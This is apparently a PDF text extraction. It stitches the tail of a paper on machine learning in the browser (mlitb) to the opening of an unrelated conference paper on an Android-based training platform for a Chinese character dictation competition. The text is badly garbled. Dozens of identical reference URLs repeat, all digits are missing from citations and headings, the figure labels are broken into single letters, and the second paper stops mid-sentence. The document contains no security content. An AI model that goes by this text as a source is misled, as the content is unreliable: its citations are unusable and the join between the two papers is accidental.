szegedy c, liu w, jia y, sermanet p, reed s, anguelov d, erhan d, vanhoucke v, rabinovich a. . going deeper with convolutions. arxiv preprint. arxiv: . v . tilkov s, vinoski s. . node.js: using javascript to build high-performance network programs. ieee internet computing ( ): – doi . /mic. . . w c. . web workers, editor’s draft may . available at http://dev.w .org/html /workers (accessed december ). w techs. . usage of javascript for websites. available at http://w techs.com/technologies/ details/cp-javascript/all/all (accessed june ). zinkevich m, weimer m, li l, smola aj. . parallelized stochastic gradient descent. in: advances in neural information processing systems, – . available at http://papers. nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf. meeds et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /j.sbi. . . https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu https://www.usenix.org/conference/osdi /technical-sessions/presentation/li_mu http://arxiv.org/abs/ . http://dx.doi.org/ . /science. http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf http://www.nrdc.org/energy/files/data-center-efficiency-assessment-ip.pdf https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / https://www.aaai.org/ocs/index.php/aaai/aaai /paper/download/ / http://dx.doi.org/ . /journal.pone. http://arxiv.org/abs/ . http://arxiv.org/abs/ . v http://dx.doi.org/ . /mic. . http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://dev.w .org/html /workers http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://w techs.com/technologies/details/cp-javascript/all/all http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://papers.nips.cc/paper/ -parallelized-stochastic-gradient-descent.pdf http://dx.doi.org/ . /peerj-cs. mlitb: machine learning in the browser introduction mlitb: vision ubiquitous machine learning cheap distributed computing reproducible and collaborative research mlitb: prototype why javascript? general architecture and design events and software behavior ml use-case: deep neural networks scaling behavior of mlitb walk-through of mlitb prototype limitations of mlitb prototype related work volunteer computing javascript applications distributed machine learning opportunities and challenges challenges opportunities future mlitb development visual programming machine learning library gpu implementations design of research closures conclusion references paper title (use style: paper title) international conference on sensor network and computer engineering (icsnce ) research on comprehensive training platform for software engineering based on android pan chunhua school of computer qinghai university for nationalities xining city, qinghai province e-mail: @qq.com sun yan school of computer qinghai university for nationalities xining city, qinghai province e-mail: sy @ .com zan fengbiao school of computer qinghai university for nationalities xining city, qinghai province e-mail: @qq.com abstract—with respect to the training program of software engineering specialty, this paper puts forward the comprehensive training platform of chinese character dictation competition based on android, and clarifies the purpose and main contents of the comprehensive training platform. based on the hardware and software facilities of the campus, the c / s model training platform, the use of android integrated training platform to achieve the chinese character writing, clearing, timing and other functions, managers of the entire process of the game management, including the participating teams and players, the administrator can simultaneously obtain the client input chinese characters, and display on the big screen, the judges then give the results after the score and statistical display. the whole integrated training platform is light and practical. keywords-c/s; server; client app i. introduction software is applied in many aspects in modern society. almost all industries have computer software applications, such as manufacturing, agriculture, banking, aviation, government agencies. modern life is almost inseparable from mobile phone. mobile applications are deployed in an incredible pace. these applications not only promote economic and social growth, but also improve the efficiency of work and life in general. the mainstream mobile phone operating systems include android, ios and, wp. with the building of training platform on android system, software engineering professionals would cultivate their software analysis, design, development and maintenance capabilities, as well as skills in project organization & management, teamwork, technological innovation & market development. this provides good experimental teaching innovation in practical environment, and reform new ideas in the process. ii. skilled required for software engineering professionals software engineering students need to learn discrete mathematics, object-oriented programming, data structure, data communication & computer network, database integrated-platform principle, software engineering, computer integrated-platform structure, software project management, unified modeling language, software quality and testing. through a comprehensive training platform students can master the mainstream and the typical software development and debugging capabilities, understand the status of software engineering development and trends, acquire good communication skills and positive teamwork attitude. iii. integrated training platform features and content software engineering professionals need to drive the theory, practice, network and experimental teaching as a whole, and complete the three-dimensional teaching as a complete teaching organization model. the comprehensive training platform is based on software engineering development practice: ) to build a unified mainstream software technology, the standard is based on the c / s architecture of the integrated training platform; ) android-based app is to imitate the training platform of the cctv chinese character dictation competition. the specific function is to provide students a chinese characters interface to write and to submit the results. the server side allows the administrator to record the student’s message and question, correct and send the answers, and summarize personal performance and team results, and finally show the result rankings. international conference on sensor network and computer engineering (icsnce ) iv. p android-based training platform a. training platform system design the integrated training platform hardware requirement: a desktop computer installed with windows and a tablet pc installed android system. this setup is simple and easy to operate, with a strong practical and promotional value. software development system requires java programming jdk and a variety of ide (eclipse or netbeans environment), and database software (such as the commonly used excel and access database, sql server ). the software for the entire training platform is common, easy to use, and reliable. b. training platform architectural framework chinese dictation system c lie n t m a n a g e m e n t p la y e r m a n a g e m e n t te st q u e stio n m a n a g e m e n t p e rfo rm a n c e m a n a g e m e n t e x a m in a tio n m a n a g e m e n t w ritin g d e le tin g su b m it in p u ttin g m o d ify in p u ttin g m o d ify e x p o rt in p u ttin g su m m a riz in g s e n d q u e stio n s s e n d m e ssa g e c o u n td o w n o th e r c o n firm to c o n tin u e figure . software structure diagram modern computer science mathematical based graph theory, research shows that the structure determines the nature. the architecture of the training platform is also a hierarchical structure of the tree. based on the c / s model two-tier model: the client + server (server program + database program). results also shows, by the training platform architecture allows students to fully grasp software engineering’s required skills. ) client app program the client uses the countdown display control and input pen to write the required chinese characters, complete the writing and modify the chinese characters, submit the result, and then wait for the server to judge. as shown in figure . contestant write chinese submit erasure figure . client-side structure ) server-side manages the entire process of the competition record the team and team members information, access client input chinese characters and display on the big screen, server controls the time of competition, show the correct answer after the client completed the submission. the judges give the points and calculate the result of the competition. the structure is shown in figure . administrator entry exam entry player player information display answer the question send information separately according to site time call ppt display <<uses>> performance management << extends>> summary ranking display of arbitration information figure . server-side structure ) module functions  the client input: students input words on the grid, complete the deletion of the whole word or erase a stroke, confirm the submission  player information: enter the modified unit, name information.  test results management: use accesss database and excel as a database with statistical support. complete the entry, modify the questions and perform statistic functions.  test management: send the beginning of the test information, questions, time information, arbitration information, send the arbitration officer. ) network communication module network communication concept and skillset is a weakness for many software engineering students. understand and master the network architecture and communication model is the key to address this problem. this is the core part of the training platform. the end system in figure is the pc, mobile phones and other entities in the communication application process. the relay system is a router with routing and packet forwarding function. the development of network communication process based on android system needs to have a bridge-like abstract unit connected to the application process. in the android system, we can use the existing socket class to complete, and the interface socket in the tcp / ip architecture is located in the application layer and transport layer, as shown in figure . from the figure if there is no interface, the entire communication will not be able to proceed; it is like we cannot send mail without postman. to understand the network structure specifically, students need to start from the horizontal peer-to-peer communication and the vertical direction of the actual data transfer. understanding both the horizontal and the vertical levels of communication is difficult. the system training platform uses the tcp connection and socket interface to complete the underlying international conference on sensor network and computer engineering (icsnce ) 